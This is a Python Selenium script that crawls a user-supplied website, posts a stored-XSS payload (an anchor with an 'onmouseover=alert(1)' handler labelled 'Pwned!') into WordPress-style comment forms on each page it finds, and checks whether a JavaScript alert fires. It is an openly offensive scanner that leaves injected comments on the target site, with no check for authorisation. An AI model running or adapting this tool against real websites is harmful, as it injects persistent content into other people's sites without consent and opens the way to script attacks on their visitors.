XSS_in_commentbox.py
from urllib.error import HTTPError
from urllib.parse import urlsplit
from urllib.request import urlopen

from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
# Overall result of the run; the crawl loop further down overwrites it with
# the return value of Type_Expl().
success = False
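def _marker_link_raises_alert():
    """Click the "Pwned!" marker link and wait up to 3 seconds for a JS alert.

    Returns normally only when an alert was observed.

    Raises:
        NoSuchElementException: the marker link is not on the current page.
        TimeoutException: the link exists but no alert appeared in time.
    """
    driver.find_element_by_link_text("Pwned!").click()
    WebDriverWait(driver, 3).until(EC.alert_is_present())
    # NOTE(review): switch_to_alert() and the find_element_by_* helpers are the
    # older Selenium spellings and are deprecated in later releases; they are
    # kept because the rest of the file uses the same API generation.
    driver.switch_to_alert()


def Type_Expl():
    """Probe the comment form on the page currently loaded in ``driver``.

    The check has two stages:

    1. If a link labelled "Pwned!" is already on the page (a marker comment
       left by an earlier run), click it and see whether an alert opens.
    2. Otherwise fill the ``author`` / ``email`` / ``comment`` fields, submit
       the marker comment, and repeat the click-and-wait check.

    An alert means the site rendered the submitted markup as a live anchor
    with an event-handler attribute, i.e. comment HTML reaches the page
    without being sanitised or attribute-escaped (stored XSS). The remedy on
    the site side is output encoding / HTML sanitisation of comment bodies.

    NOTE(review): a submitted comment stays on the site after the run; the
    page URL is not recorded anywhere here, so cleanup has to be tracked by
    the operator.

    Returns:
        True when an alert was observed, False in every other case
        (no comment form, marker not rendered, or no alert within 3 s).
    """
    # Stage 1: a marker from a previous run may already be rendered.
    try:
        _marker_link_raises_alert()
    except (TimeoutException, NoSuchElementException):
        pass
    else:
        print("XSS удался!")
        return True

    # Stage 2: submit the marker comment, then re-check.
    submitted = False
    try:
        author = driver.find_element_by_name("author")
        author.send_keys("Nagibator")
        email = driver.find_element_by_name("email")
        email.send_keys("Nagibator@gmail.com")
        commentbox = driver.find_element_by_id("comment")
        commentbox.send_keys("[a <a href=']'></a><a href=' onmouseover=alert(1) '>Pwned!</a>")
        commentbox.submit()
        submitted = True
        _marker_link_raises_alert()
    except (NoSuchElementException, TimeoutException):
        if submitted:
            # Message: the comment was sent, but moderation hides it, so the
            # result cannot be verified from this session.
            print("Эксплоит был применён, но, из-за модерации комментариев, нельзя проверить удачно, или нет")
        # Every failure path returns an explicit False so callers comparing
        # the result against True/False never see None.
        return False

    print("XSS удался!")
    return True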
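# Entry script: load the page the operator names, collect its links, and run
# Type_Expl() on each linked page (and on its comments view, when one exists).
url = input("Введите адрес сайта\n")
print("Подождите")
driver = webdriver.Firefox()
try:
    driver.get(url)

    # Only pages on the host that was actually loaded are probed. Type_Expl()
    # writes a comment to whatever page it is given, so links that leave the
    # site (themes, plugins, social widgets) must not be followed.
    target_host = urlsplit(driver.current_url).hostname
    skipped = {"http://wordpress.org/", "http://ru.wordpress.org/"}

    pages = []
    for anchor in driver.find_elements_by_tag_name("a"):
        href = anchor.get_attribute('href')
        # Anchors without an href yield None; driver.get(None) would fail.
        if not href or href in skipped or href in pages:
            continue
        # mailto:/javascript: links have no hostname and are dropped here too.
        if urlsplit(href).hostname != target_host:
            continue
        pages.append(href)

    for page in pages:
        driver.get(page)
        success = Type_Expl()
        if success:
            break

        # The form may sit behind a "Comment(s)" / "Комментарии" link; try the
        # English label first, then the Russian one, and probe once.
        for label in ("omment", "оммента"):
            try:
                link = driver.find_element_by_partial_link_text(label)
            except NoSuchElementException:
                continue
            link.click()
            success = Type_Expl()
            break
        if success:
            break

    if not success:
        # Message: the injection did not succeed.
        print("Инъекция не удалась")
finally:
    # Close the browser even when a page load or lookup raises.
    driver.quit()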
#assert "Python" in driver.title
#element = driver.find_element_by_id("comment")
#element.send_keys("[a <a href=']'></a><a href=' onmouseover=alert(1) '>Pwned!</a>")
#element.submit()
#driver.quit()